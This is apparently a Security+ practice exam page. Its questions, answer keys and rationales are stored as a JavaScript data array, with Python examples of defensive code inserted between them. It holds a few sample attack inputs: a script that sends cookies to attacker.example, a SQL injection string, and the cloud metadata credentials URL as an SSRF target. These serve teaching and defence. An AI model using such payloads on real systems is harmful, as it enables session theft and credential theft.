A full diagnostic practice test modeled on the real Security+ SY0-701 — same four content categories, same proportions. Find out exactly where you stand before test day.
40
Questions
4
Categories
90m
Real Exam Time
~150
Target Score
How this works
Answer every question — you can navigate freely and change answers before submitting.
You will not see correct answers during the test, just like the real exam.
After you submit, you get a scaled-style score, a pass/no-pass read, and a category-by-category diagnostic showing where you're ready and where you need work.
Every question is then revealed with the correct answer and a full rationale.
Enable the 90-minute timer for realistic pacing practice (optional; you can keep going if it runs out)
This is where the real value is — see exactly which domains are ready and which need work before test day.
. The site displays the review without sanitization on the product page. What is the consequence?",
options:["The attacker's machine is exposed to attack","Anyone viewing the product page sends their session cookie to attacker.com (stored XSS)","The site's database is destroyed","The product page becomes unavailable"],
correct:1,
rationale:"This is stored (persistent) XSS. The malicious script is saved in the database with the review and executed by every visitor's browser when the page is rendered, exfiltrating session cookies; the attacker can then hijack those sessions. The fix is output encoding of the review at render time, backed by a Content Security Policy; marking the session cookie HttpOnly blunts this particular payload but not XSS in general. The attacker's machine is the receiver, not the target. The database is not destroyed. The page remains available, which is exactly what makes the attack work."
},
{
cat:"D2",
q:"During an investigation, a SOC analyst finds a workstation making periodic outbound connections to a known malicious IP address. The IP address is an example of what?",
options:["A vulnerability","An exploit","An indicator of compromise (IoC)","A threat actor"],
correct:2,
rationale:"An indicator of compromise (IoC) is observable evidence that a system has been or is being compromised — known-bad IPs, malware file hashes, suspicious filenames, C2 domains. A vulnerability is a weakness. An exploit is a technique that takes advantage of a vulnerability. A threat actor is the human or group behind the activity."
},
{
cat:"D2",
q:"An attacker on the same network as a user intercepts the user's HTTPS connection to a banking site and forces the client and server to negotiate down to TLS 1.0 with a weak cipher suite. What type of attack is this?",
options:["Birthday attack","Collision attack","Downgrade attack","Replay attack"],
correct:2,
rationale:"A downgrade attack forces the use of an older, weaker protocol or cipher than both parties actually support, usually by tampering with the negotiation handshake (POODLE combined a forced fallback to SSL 3.0 with a CBC padding-oracle flaw). A birthday attack exploits the probability of hash collisions. A collision attack finds two inputs that hash to the same value. A replay attack captures and re-sends a valid message. Defenses: disable TLS 1.0/1.1 and weak suites on the server, support TLS_FALLBACK_SCSV for legacy clients that retry at lower versions, and prefer TLS 1.3, whose ServerHello random carries a downgrade sentinel so a client that supports 1.3 can detect being pushed to 1.2 or below."
},
{
cat:"D2",
q:"An attacker on a public Wi-Fi network uses ARP spoofing to associate their MAC address with the gateway's IP. All traffic from victim devices is now relayed through the attacker's machine. Which attack class is this?",
options:["Phishing","On-path (formerly man-in-the-middle)","SQL injection","Buffer overflow"],
correct:1,
rationale:"On-path (the modern term for man-in-the-middle, MITM) attacks position the attacker between two communicating parties so traffic can be observed or modified. ARP spoofing on a local network is one classic way to achieve on-path positioning. Phishing tricks users. SQL injection attacks web-app data layers. Buffer overflow is a memory-safety vulnerability."
},
{
cat:"D2",
q:"An attacker sets up a rogue access point in an airport named 'Airport_Free_WiFi' that mimics the legitimate airport WiFi. Travelers connect to it and the attacker captures their traffic. What is this attack?",
options:["War driving","Bluesnarfing","Evil twin","RFID skimming"],
correct:2,
rationale:"An evil twin is a rogue wireless access point set up to impersonate a legitimate one, tricking users into connecting and exposing their traffic. War driving is the practice of searching for and mapping wireless networks while driving. Bluesnarfing is unauthorized access via Bluetooth. RFID skimming captures contactless-card data."
},
{
cat:"D2",
q:"An attacker tries thousands of passwords per second against a single user account until one works. What attack is this, and what is the simplest mitigation?",
options:["Credential stuffing — MFA","Brute force — account lockout after N failed attempts","Phishing — security awareness training","Rainbow table attack — strong password hashing"],
correct:1,
rationale:"A brute-force attack iterates through possible passwords against a single account. The simplest, most effective server-side mitigation is account lockout after a small number of failed attempts (e.g., 5), which turns thousands of guesses per second into a handful per lockout period. In practice make the lockout temporary and pair it with per-source rate limiting and MFA, because a permanent lockout lets an attacker deny service to any victim simply by failing that victim's login on purpose. Credential stuffing reuses leaked username/password pairs. Phishing is a different attack class. Rainbow tables attack stored hash dumps offline and are mitigated by salting."
},
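The lockout control from the rationale above, as an added worked example that is not part of the original practice test. The thresholds (5 failures in 15 minutes, 15-minute lock) and the `LoginGuard` name are assumptions chosen for illustration; the clock is injectable so the scenario runs deterministically offline.

```python
import time
from collections import defaultdict, deque

# Illustrative defaults (assumptions, tune per environment): five failures in
# a 15-minute window locks the account for 15 minutes. The lock is temporary
# on purpose: a permanent lockout lets an attacker deny service to any user
# just by spraying wrong passwords at that user's account.
MAX_FAILURES = 5
WINDOW_SECONDS = 15 * 60
LOCKOUT_SECONDS = 15 * 60


class LoginGuard:
    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS,
                 lockout=LOCKOUT_SECONDS, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.clock = clock                  # injectable for deterministic tests
        self.failures = defaultdict(deque)  # user -> timestamps of recent failures
        self.locked_until = {}              # user -> clock value when the lock expires

    def _prune(self, user, now):
        # Drop failures that fell out of the sliding window.
        dq = self.failures[user]
        while dq and now - dq[0] > self.window:
            dq.popleft()

    def is_locked(self, user):
        until = self.locked_until.get(user)
        if until is None:
            return False
        if self.clock() >= until:
            del self.locked_until[user]     # lock expired; start fresh
            self.failures[user].clear()
            return False
        return True

    def attempt(self, user, password_ok):
        """Return True if the login is accepted, False if rejected or locked."""
        now = self.clock()
        if self.is_locked(user):
            return False                    # do not even evaluate the password
        if password_ok:
            self.failures[user].clear()
            return True
        self._prune(user, now)
        self.failures[user].append(now)
        if len(self.failures[user]) >= self.max_failures:
            self.locked_until[user] = now + self.lockout
        return False


def demo():
    # Constructed scenario driven by a fake clock: an attacker burns through
    # the allowed failures, then the real user tries the correct password.
    clock = [0.0]
    guard = LoginGuard(clock=lambda: clock[0])
    out = {}
    for _ in range(MAX_FAILURES):
        guard.attempt("alice", password_ok=False)
        clock[0] += 0.1
    out["locked_after_failures"] = guard.is_locked("alice")
    out["correct_password_while_locked"] = guard.attempt("alice", password_ok=True)
    clock[0] += LOCKOUT_SECONDS + 1
    out["correct_password_after_lockout"] = guard.attempt("alice", password_ok=True)
    out["other_user_unaffected"] = guard.attempt("bob", password_ok=True)
    return out


if __name__ == "__main__":
    print(demo())
```

The guard is keyed on the account, which is what stops brute force against a single user; a password-spraying attacker who rotates accounts is caught only by the per-source throttling mentioned in the rationale, which this class deliberately leaves to the network or gateway layer.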
{
cat:"D2",
q:"An attacker gains access to a non-privileged user account on a Linux server. They then exploit a kernel vulnerability to become root. What is this technique called?",
options:["Lateral movement","Vertical privilege escalation","Horizontal privilege escalation","Persistence"],
correct:1,
rationale:"Vertical privilege escalation is gaining higher rights than originally granted (user → root). Horizontal privilege escalation is taking over another account at the same level (user A → user B's data). Lateral movement is moving from one host to another. Persistence is establishing mechanisms to maintain access across reboots."
},
{
cat:"D2",
q:"A web application checks whether a user has permission to access a file, then opens the file. An attacker exploits the tiny window between the check and the open to swap the file with a symlink to /etc/shadow. What class of vulnerability is this?",
options:["Buffer overflow","Time-of-check to time-of-use (TOCTOU) race condition","Integer overflow","SQL injection"],
correct:1,
rationale:"TOCTOU is a race-condition vulnerability where a security check is separated in time from the action it authorizes, allowing an attacker to change the state between the two. The fix is to stop reasoning about path names: open the file once (with O_NOFOLLOW where symlinks are a concern), then perform the check on the open file descriptor with fstat, so the object that was checked is guaranteed to be the object that is used. Buffer overflow corrupts memory boundaries. Integer overflow exploits arithmetic wraparound. SQL injection targets unsanitized SQL."
},
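The check-then-open race and its descriptor-based fix, as an added worked example that is not part of the original practice test. The function names and the temp-directory scenario (a regular file plus a symlink standing in for the attacker's swap to /etc/shadow) are constructed for illustration; the flags used are POSIX-only.

```python
import os
import stat
import tempfile


def read_if_allowed_vulnerable(path):
    # Check-then-use on a path name. Between os.access() and open() the path
    # is resolved twice; an attacker who replaces the file with a symlink in
    # that window gets the link target read with our privileges.
    if not os.access(path, os.R_OK):
        raise PermissionError(path)
    with open(path, "rb") as f:
        return f.read()


def read_if_allowed_safe(path, expected_uid=None):
    # Open exactly once, refusing a symlink at the final path component, and
    # make every decision on the descriptor we actually hold (POSIX flags).
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)                   # describes the open object, not a name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file: %s" % path)
        if expected_uid is not None and st.st_uid != expected_uid:
            raise PermissionError("unexpected owner for %s" % path)
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:          # fdopen takes ownership of fd
        return f.read()


def demo():
    # Constructed scenario: a regular file and a symlink pointing at it, the
    # symlink standing in for the attacker's swap to /etc/shadow.
    out = {}
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "secret.txt")
        link = os.path.join(d, "review.txt")
        with open(target, "wb") as f:
            f.write(b"top secret\n")
        os.symlink(target, link)
        out["regular_safe"] = read_if_allowed_safe(target, expected_uid=os.getuid())
        out["symlink_vulnerable"] = read_if_allowed_vulnerable(link)   # follows the link
        try:
            read_if_allowed_safe(link)
            out["symlink_safe"] = "opened"
        except OSError:                     # ELOOP raised by O_NOFOLLOW
            out["symlink_safe"] = "refused"
    return out


if __name__ == "__main__":
    print(demo())
```

O_NOFOLLOW only covers the last path component; if an attacker can replace a parent directory with a symlink, walk the path with a directory descriptor (openat) or confine the application to a directory it owns.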
{
cat:"D2",
q:"An open-source npm package used by thousands of applications is compromised when an attacker gains access to the maintainer's account and pushes a malicious update. Applications that auto-update pull in the malicious version. What category of attack is this?",
options:["Insider threat","Supply chain attack","Distributed denial of service","Phishing"],
correct:1,
rationale:"A supply chain attack compromises a trusted upstream dependency to reach many downstream targets at once. SolarWinds, Codecov, and various npm package compromises are famous examples. An insider threat is from a trusted user of the targeted organization. DDoS overwhelms availability. Phishing tricks users directly."
},
{
cat:"D2",
q:"An attacker successfully exploits a stack buffer overflow in a C program. The program has DEP (NX bit) enabled but does NOT have ASLR. Which exploitation technique is MOST likely to succeed?",
options:["Direct shellcode injection in the buffer","Return-oriented programming (ROP) using gadgets at known addresses","Format string attack","SQL injection"],
correct:1,
rationale:"DEP (Data Execution Prevention, the NX bit) prevents the stack from being executed as code, defeating naive shellcode injection. ROP chains together short snippets of existing executable code (gadgets) in the program's text segment. ROP requires knowing where those gadgets are — without ASLR, the addresses are static and predictable, making ROP highly reliable. (A) is blocked by DEP. (C) and (D) are separate classes."
},
{
cat:"D2",
q:"An employee uses a badge to open a secured door at the company entrance. A stranger they do not know walks in behind them before the door closes. What is this called?",
options:["Piggybacking / tailgating","Shoulder surfing","Dumpster diving","Pharming"],
correct:0,
rationale:"Tailgating (also called piggybacking) is unauthorized entry to a secured area by following an authorized person through the door. Mitigations include access control vestibules (mantraps), employee training to challenge unknown followers, and turnstile-style entries that admit one person per badge read. Shoulder surfing is observing someone's screen or keystrokes. Dumpster diving is searching trash for sensitive information. Pharming is DNS redirection."
},
{
cat:"D2",
q:"Which of the following BEST describes the difference between a vulnerability scan and a penetration test?",
options:["They are the same thing","A vulnerability scan identifies potential weaknesses; a penetration test attempts to exploit them to demonstrate impact","A penetration test is automated; a vulnerability scan is manual","A vulnerability scan is always destructive; a penetration test is always safe"],
correct:1,
rationale:"A vulnerability scan uses automated tooling to identify known weaknesses (missing patches, weak configs, default creds) — broad and shallow. A penetration test goes further: it attempts actual exploitation, chains vulnerabilities, and demonstrates real-world impact — narrow and deep. (C) is backwards. (D) is also backwards — pentests CAN be destructive; scans are usually non-disruptive."
},
{
cat:"D2",
q:"A web application accepts a URL from the user and fetches that URL server-side to display a preview. An attacker submits http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata URL. What attack is this, and what does the attacker gain?",
options:["SSRF — access to the cloud instance's IAM credentials","XSS — the attacker's script runs in other users' browsers","CSRF — the attacker makes the server perform an action on the user's behalf","Directory traversal — the attacker reads arbitrary local files"],
correct:0,
rationale:"Server-Side Request Forgery (SSRF) tricks the server into making a request to a destination the attacker chooses, often an internal or cloud-only address. AWS's metadata service at 169.254.169.254 returns IAM role credentials that are reachable only from inside the instance; an SSRF that reaches it can extract those credentials and pivot into the cloud account. IMDSv2 is the standard mitigation: it requires a session token obtained with a PUT request carrying a custom header, which a typical SSRF (one GET to an attacker-controlled URL) cannot perform. On the application side, resolve the target and reject non-public addresses before fetching. (B), (C), and (D) describe different attack classes."
},
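The application-side check from the rationale above, as an added worked example that is not part of the original practice test. The policy (http/https only, no credentials in the URL, every resolved address must be globally routable) and the function names are assumptions for illustration; `resolver` is injectable so the hostname cases run offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # no file://, gopher://, ftp://, ...


def _resolve_all(host):
    # Every address the name maps to. A literal IP comes back unchanged
    # without touching DNS; the safety check runs on the resolved address,
    # not on however the attacker spelled it in the URL.
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    seen = []
    for info in infos:
        ip = info[4][0]
        if ip not in seen:
            seen.append(ip)
    return seen


def public_ip(ip_text):
    """Return the address if it is globally routable, else raise ValueError."""
    ip = ipaddress.ip_address(ip_text.split("%")[0])   # drop any IPv6 scope id
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:169.254.169.254 -> 169.254.169.254
    if not ip.is_global:               # private, loopback, link-local, reserved...
        raise ValueError("non-public address: %s" % ip)
    return ip


def resolve_target(url, resolver=_resolve_all):
    """Validate url; return (scheme, host, port, ip) where ip is the one
    address the fetch must connect to. Raises ValueError when unsafe."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    addrs = resolver(host)
    if not addrs:
        raise ValueError("could not resolve %r" % host)
    # Every record must pass: a name with one public and one internal answer
    # is rejected rather than fetched on the luck of the draw.
    ips = [public_ip(a) for a in addrs]
    # Connect to ips[0] directly (pin it) instead of letting the HTTP client
    # re-resolve the name, or a DNS-rebinding answer can change between
    # this check and the actual connection.
    return parts.scheme, host, port, str(ips[0])


def is_safe_url(url, resolver=_resolve_all):
    try:
        resolve_target(url, resolver)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(is_safe_url("http://169.254.169.254/latest/meta-data/iam/security-credentials/"))
    print(resolve_target("http://8.8.8.8/preview"))
```

Allow-listing by address is a floor, not a ceiling: redirects must be re-validated hop by hop, and the fetch itself should run with no cloud credentials and a short timeout so a blocked destination cannot be reached by a second request.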
{
cat:"D2",
q:"An attacker successfully injects a forged DNS record for 'bank.com' into a recursive DNS resolver's cache. All clients that query this resolver for bank.com now resolve to the attacker's IP. What is this attack, and what protocol mitigates it?",
options:["DNS amplification — rate limiting","DNS cache poisoning — DNSSEC","ARP poisoning — DAI (Dynamic ARP Inspection)","BGP hijack — RPKI"],
correct:1,
rationale:"DNS cache poisoning injects forged answers into a resolver's cache, redirecting users to attacker-controlled destinations. DNSSEC cryptographically signs DNS records, allowing resolvers to verify authenticity and reject forged answers. DNS amplification is a different attack (used for DDoS). ARP poisoning and BGP hijack are real attacks with real mitigations but are not what this scenario describes."
},
{
cat:"D2",
q:"A hospital still runs a critical patient-monitoring application that requires Windows Server 2008, which the vendor no longer supports. What is the GREATEST security risk?",
options:["The hospital cannot get a refund","New vulnerabilities discovered after end-of-life will not be patched, creating permanent exposure","The software will stop working entirely","Insurance premiums will rise"],
correct:1,
rationale:"End-of-life (EOL) software no longer receives security updates from the vendor. New vulnerabilities discovered after EOL remain exploitable indefinitely on that system. Compensating controls (network segmentation, application allow-listing, strict monitoring) may be necessary if the system cannot be replaced. (A), (C), and (D) are not the greatest security risk."
},
{
cat:"D2",
q:"PERFORMANCE-BASED: Match each attack technique to the MOST effective primary mitigation. Attacks: (1) SQL injection, (2) Cross-site scripting, (3) CSRF, (4) Buffer overflow in C, (5) Phishing. Mitigations: (A) Anti-CSRF tokens on state-changing requests, (B) Parameterized queries, (C) Bounded copy functions plus ASLR plus DEP, (D) Output encoding plus Content Security Policy, (E) User awareness training plus email filtering plus DMARC. What is the correct mapping?",
options:["1-A, 2-B, 3-C, 4-D, 5-E","1-B, 2-D, 3-A, 4-C, 5-E","1-C, 2-A, 3-D, 4-B, 5-E","1-B, 2-A, 3-D, 4-C, 5-E"],
correct:1,
rationale:"Each pairing matches root-cause to the mitigation. SQL injection roots in unparameterized query construction — parameterized queries are the canonical fix (1-B). XSS roots in untrusted data rendered as HTML — output encoding plus CSP defends (2-D). CSRF roots in trusted cookies auto-sent on cross-site requests — anti-CSRF tokens break the trust automation (3-A). Buffer overflows root in unbounded memory operations — bounded copies plus runtime hardening (4-C). Phishing roots in human deception — training plus filtering plus DMARC (5-E)."
},
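The three web-application pairings from the matching question (1-B parameterized queries, 2-D output encoding, 3-A anti-CSRF tokens), each as a vulnerable form beside its hardened form, serving this question and the stored-XSS question earlier on the page. This is an added worked example, not part of the original practice test; the in-memory SQLite table, the review payload and the function names are constructed for illustration.

```python
import html
import hmac
import secrets
import sqlite3

# Constructed sample data: a stored review carrying the cookie-stealing
# payload from the stored-XSS question (attacker.example is a placeholder).
EVIL_REVIEW = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "user"), ("bob", "admin")])
    return conn


# (1) SQL injection: root cause is building SQL syntax out of user input.
def find_user_vulnerable(conn, name):
    return conn.execute(
        "SELECT name FROM users WHERE name = '" + name + "'").fetchall()


def find_user_safe(conn, name):
    # Parameterized query: the driver binds the value; it can never become syntax.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()


# (2) XSS: root cause is rendering untrusted data as HTML.
def render_review_vulnerable(review):
    return '<div class="review">' + review + "</div>"


def render_review_safe(review):
    # Output encoding turns markup characters into inert entities. A CSP
    # header (not shown) limits the damage if any encoding is ever missed.
    return '<div class="review">' + html.escape(review, quote=True) + "</div>"


# (3) CSRF: root cause is the browser auto-sending cookies cross-site. The
# token lives in the session and in the form; a cross-site page cannot read it.
def issue_csrf_token():
    return secrets.token_urlsafe(32)


def csrf_token_valid(session_token, submitted_token):
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)  # constant-time


if __name__ == "__main__":
    conn = make_db()
    payload = "x' OR '1'='1"
    print(find_user_vulnerable(conn, payload))   # every row leaks
    print(find_user_safe(conn, payload))         # []
    print(render_review_safe(EVIL_REVIEW))
```

Encoding is context-specific: `html.escape` is correct for text and attribute values, but data placed inside a script block, a URL or a CSS value needs the encoder for that context, and a template engine that auto-escapes is the practical way to make the safe form the default.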
{
cat:"D3",
q:"A hospital has a network with patient-monitoring devices (medical IoT), an electronic health record (EHR) system, and public Wi-Fi for visitors. What is the BEST network design?",
options:["One flat /16 network for ease of management","Three VLANs with no inter-VLAN routing","Three segmented zones with firewall rules controlling necessary inter-zone traffic","Place visitor Wi-Fi on the same VLAN as the EHR system to simplify ACLs"],
correct:2,
rationale:"Hospital networks classically separate clinical (EHR), medical-device (IoT), and visitor zones with firewall-controlled inter-zone traffic. The EHR may need to receive vitals data from monitors via a controlled, audited path, but visitor Wi-Fi should never have a path to either. A flat network provides no isolation — unacceptable for HIPAA-regulated data. Three VLANs with no routing would prevent monitors from feeding EHR. Option D is dangerous on its face."
},
{
cat:"D3",
q:"An organization needs to encrypt 5 TB of data at rest on a database server. Which combination of algorithm and mode is MOST appropriate?",
options:["RSA-2048 for the full dataset","AES-256 in ECB mode","AES-256 in GCM mode","SHA-256"],
correct:2,
rationale:"AES-256 is a symmetric algorithm appropriate for bulk data encryption. GCM mode provides confidentiality AND authenticated encryption (a built-in integrity tag). The practitioner's caveat: a (key, nonce) pair must never be reused and a single GCM message is limited to about 64 GB, so 5 TB is encrypted as many records or chunks, each with its own nonce; block-device and full-disk products typically use XTS mode instead, but of the four choices AES-256-GCM is the only sound one. RSA is asymmetric and computationally impractical for multi-terabyte datasets; it is used for key exchange or to wrap the data-encryption key. ECB mode reveals patterns in plaintext and is broken for structured data. SHA-256 is a hash function: integrity, not encryption."
},
{
cat:"D3",
q:"An organization is moving its email system to a SaaS provider (Microsoft 365). Under the shared responsibility model, who is responsible for managing user account permissions and configuring conditional-access policies?",
options:["The SaaS provider only","The customer only","Shared equally between customer and provider","Neither — these are handled by the underlying IaaS layer"],
correct:1,
rationale:"In a SaaS model the provider manages the application, infrastructure, OS, and physical security. The customer always retains responsibility for IDENTITY, ACCESS MANAGEMENT, and DATA — including who has accounts and what conditional-access policies are enforced. The provider does not configure your users for you. (C) misstates the SaaS model. (D) is wrong — IaaS is a different model."
},
{
cat:"D3",
q:"An employee working from a coffee shop needs to securely access internal company file shares. Which technology is MOST appropriate?",
options:["A site-to-site VPN","A remote-access (client) VPN","A web proxy","RDP exposed to the public internet"],
correct:1,
rationale:"A remote-access VPN authenticates an individual user's device to the corporate network and encrypts the tunnel between them, providing access to internal resources as if the user were on the corporate LAN. A site-to-site VPN connects two NETWORKS. A web proxy routes web traffic but does not provide access to file shares. RDP exposed to the public internet is a major security risk."
},
{
cat:"D3",
q:"A startup wants to run a Linux server in the cloud without managing any underlying hardware, but they want full control over the OS and software stack. Which cloud service model is this?",
options:["IaaS (Infrastructure as a Service)","PaaS (Platform as a Service)","SaaS (Software as a Service)","FaaS (Function as a Service)"],
correct:0,
rationale:"IaaS gives the customer virtual machines (or containers) with full control of the OS and software stack. The provider manages the physical hardware, virtualization layer, and networking. PaaS abstracts the OS — the customer just deploys their code. SaaS delivers a complete application. FaaS runs individual functions on demand with no persistent server."
},
{
cat:"D3",
q:"Which of the following BEST describes the security difference between a Type 1 and Type 2 hypervisor?",
options:["Type 1 runs on bare metal; Type 2 runs on a host OS, generally with a larger attack surface","Type 1 runs on a host OS; Type 2 runs on bare metal","There is no security difference","Type 2 is more secure because it has more abstraction layers"],
correct:0,
rationale:"Type 1 hypervisors (Xen, ESXi, Hyper-V) run directly on bare metal. Type 2 hypervisors (VirtualBox, VMware Workstation) run on top of a host operating system, so the host's entire attack surface is added to the hypervisor's: compromise the host OS and every guest on it is compromised too. Type 1 is therefore generally more appropriate for production isolation. (B) reverses the definitions. (C) and (D) are incorrect."
},
{
cat:"D3",
q:"An attacker who has compromised a guest VM exploits a vulnerability in the hypervisor to gain code execution on the host system, allowing them to access other guest VMs. What is this attack called?",
options:["VM sprawl","VM escape","Containerization breakout","Hyperjacking"],
correct:1,
rationale:"VM escape is when an attacker in a guest VM exploits a hypervisor vulnerability to break out into the host system, potentially compromising every other guest on the same host. Famous examples include CVE-2017-4903 (VMware) and various Xen vulnerabilities. VM sprawl is the operational problem of too many unmanaged VMs. Container breakout is the analogous concept for containers, not VMs. Hyperjacking is hijacking the hypervisor itself via an installed rootkit."
},
{
cat:"D3",
q:"Which statement BEST captures the security difference between containers (e.g., Docker) and virtual machines?",
options:["Containers share the host OS kernel; VMs have their own kernels — so a container escape is generally more impactful than a VM escape from a defense-in-depth perspective","Containers and VMs have identical security properties","VMs share the host kernel; containers do not","Containers are always more secure than VMs"],
correct:0,
rationale:"Containers share the host operating system kernel; VMs run their own complete OS. Because containers share the kernel, a kernel-level escape from a container reaches the host directly — there is less isolation between container and host than between VM and host. This does not mean containers are insecure, but it changes the threat model. (C) reverses the architectures. (D) is too absolute."
},
{
cat:"D3",
q:"A company runs a public-facing web server and an internal database server. Where should the web server be placed in the network?",
options:["On the internal LAN with the database","In a DMZ (screened subnet) with restricted inbound and outbound firewall rules","Directly on the internet with no firewall","On the same VLAN as employee workstations"],
correct:1,
rationale:"A DMZ (also called a screened subnet) is a network segment for systems that must be reachable from the public internet but should be isolated from internal systems. Firewall rules restrict what the DMZ host can reach inbound and outbound, so a compromise of the web server does not immediately expose internal databases. (A), (C), and (D) all collapse the isolation that is the point of having a DMZ."
},
{
cat:"D3",
q:"An organization decomposes a monolithic application into 40 microservices, each communicating over HTTPS. What is the GREATEST new security consideration this introduces?",
options:["The application runs slower","Service-to-service authentication and authorization (often via mTLS or service mesh) becomes critical at a scale that did not exist before","The code is harder to write","The hosting cost increases"],
correct:1,
rationale:"Microservices multiply the number of trust boundaries within the application. Service-to-service authentication and authorization, often implemented via mTLS (mutual TLS) or a service mesh like Istio/Linkerd, becomes mandatory; treating the internal network as a trusted zone where services need not authenticate each other is the classic mistake. Performance, code complexity, and cost are real concerns but not the GREATEST SECURITY consideration."
},
{
cat:"D3",
q:"An organization deploys a serverless function (AWS Lambda, Azure Functions) that processes user uploads. Which security consideration is MOST DIFFERENT from a traditional server deployment?",
options:["There is no need to think about security in serverless","The customer no longer patches the OS, but IAM-permission tightness on the function becomes the dominant security control","Serverless is immune to injection attacks","Serverless functions cannot be exploited"],
correct:1,
rationale:"In serverless, the cloud provider manages the OS, the runtime, and physical security. The customer's primary security responsibility shifts to the IAM role attached to the function (over-permissive IAM is the #1 serverless mistake), input validation, and dependency hygiene. Injection attacks still apply at the application code level. (A), (C), (D) are dangerous misconceptions."
},
{
cat:"D3",
q:"A Zero Trust Architecture implementation requires that every access decision incorporate which of the following inputs?",
options:["Only the user's username and password","User identity, device posture/health, request context (location, time), and resource sensitivity — combined into a per-request policy decision","Only the source IP address of the request","Only whether the user is on the corporate network"],
correct:1,
rationale:"Zero Trust evaluates every request against rich context: who is asking (verified identity, often with MFA), what device they are on (managed, patched, compliant), where and when the request comes from, and how sensitive the requested resource is. Decisions are per-request, not per-session. Source IP alone or network location alone is exactly the implicit-trust model Zero Trust is designed to replace."
},
{
cat:"D3",
q:"An analyst is reviewing data classification labels. Which set BEST describes the three states data can exist in for security planning purposes?",
options:["Hot, warm, cold","Encrypted, hashed, plaintext","At rest, in transit, in use","Backup, primary, archive"],
correct:2,
rationale:"Data exists in three states: at rest (stored on disk or other persistent media), in transit (moving across a network), and in use (loaded in active memory or being processed). Each state has its own protection requirements — disk encryption for at rest, TLS for in transit, confidential computing or memory protection for in use. (A) describes data storage tiers. (B) describes transformations. (D) describes backup tiers."
},
{
cat:"D3",
q:"A company encrypts all data on its hard drives using BitLocker. An attacker steals a powered-off laptop. What security property does BitLocker provide in this scenario?",
options:["Confidentiality of data at rest","Confidentiality of data in transit","Authentication of the user","Non-repudiation of file modifications"],
correct:0,
rationale:"Full-disk encryption like BitLocker protects data at rest — when the device is powered off, the data on disk is encrypted and inaccessible without the decryption key (which is typically protected by the TPM, a PIN, or both). It does not protect data in transit, authenticate the user (login mechanisms do that), or provide non-repudiation. Once the device is unlocked and running, the data is decrypted in memory and FDE no longer applies."
},
{
cat:"D3",
q:"A retailer wants to store credit card numbers in a form that allows them to perform transactions but never stores the actual PAN. What technique BEST achieves this?",
options:["Hashing the PAN with SHA-256","Tokenization — replacing the PAN with a token that maps to it in a secure vault","Encrypting the PAN with AES","Masking the PAN (showing only the last 4 digits)"],
correct:1,
rationale:"Tokenization replaces a sensitive value (PAN) with a non-sensitive token; the mapping is held in a separate, hardened vault. Applications work with tokens; only the vault sees the real PAN. This dramatically shrinks PCI DSS scope. Hashing is one-way — cannot be used for transactions. Encryption is reversible but requires key management at every system that needs the real value. Masking only hides display; the underlying value is still stored."
},
{
cat:"D3",
q:"Why are password hashes 'salted' before storage?",
options:["To make the hash function run faster","To defeat precomputed rainbow tables by making identical passwords produce different hashes","To compress the hash to a smaller size","To encrypt the password reversibly"],
correct:1,
rationale:"A salt is a unique random value added to each password before hashing and stored alongside the hash. It defeats rainbow tables (precomputed hash dictionaries) because the attacker would need a separate table per salt, which is impractical, and it ensures two users with the same password have different stored hashes, so cracking one does not reveal the other. Salting alone does not slow down guessing; pair it with a deliberately slow or memory-hard function (bcrypt, scrypt, Argon2) rather than a fast hash like SHA-256. Salting does not speed up the hash, compress it, or make it reversible."
},
{
cat:"D3",
q:"An organization wants to process highly sensitive data in a cloud VM such that even the cloud provider's privileged operators cannot read the data in memory. Which technology is MOST appropriate?",
options:["Full-disk encryption","Confidential computing using Trusted Execution Environments (TEEs) like Intel SGX or AMD SEV","VLAN segmentation","Standard TLS"],
correct:1,
rationale:"Confidential computing protects data IN USE — in memory — by running workloads inside a hardware-isolated Trusted Execution Environment (TEE) such as Intel SGX, AMD SEV, or AWS Nitro Enclaves. The cloud provider's hypervisor and operators cannot read the memory inside the TEE. Full-disk encryption protects at rest. TLS protects in transit. VLANs segment network traffic, not memory."
},
{
cat:"D3",
q:"An organization manages its cloud infrastructure with Terraform. Someone manually changes a security group rule directly in the AWS console. The Terraform state no longer matches reality. What is this condition called, and what is the security risk?",
options:["Configuration drift — undocumented changes evade review and can introduce vulnerabilities or break re-deployments","Immutable infrastructure — there is no security risk","Blue-green deployment — improves security","Canary release — no risk"],
correct:0,
rationale:"Configuration drift occurs when the actual state of infrastructure diverges from the declared (IaC) state. The security risk: changes evade the code review and change-management process, can introduce vulnerabilities, and any subsequent terraform apply may either revert the manual fix or fail unpredictably. Mitigations include alerting on drift, disabling console write access, and treating IaC as the only source of truth."
},
{
cat:"D3",
q:"A water utility runs ICS/SCADA systems that control pumps and valves. What is the MOST important architectural principle for protecting these systems?",
options:["Run the same antivirus on ICS endpoints as on office laptops","Strict network segmentation isolating OT from IT, with controlled and monitored crossing points (data diodes, jump hosts)","Expose ICS systems directly to the internet for remote management","Disable all monitoring to reduce attack surface"],
correct:1,
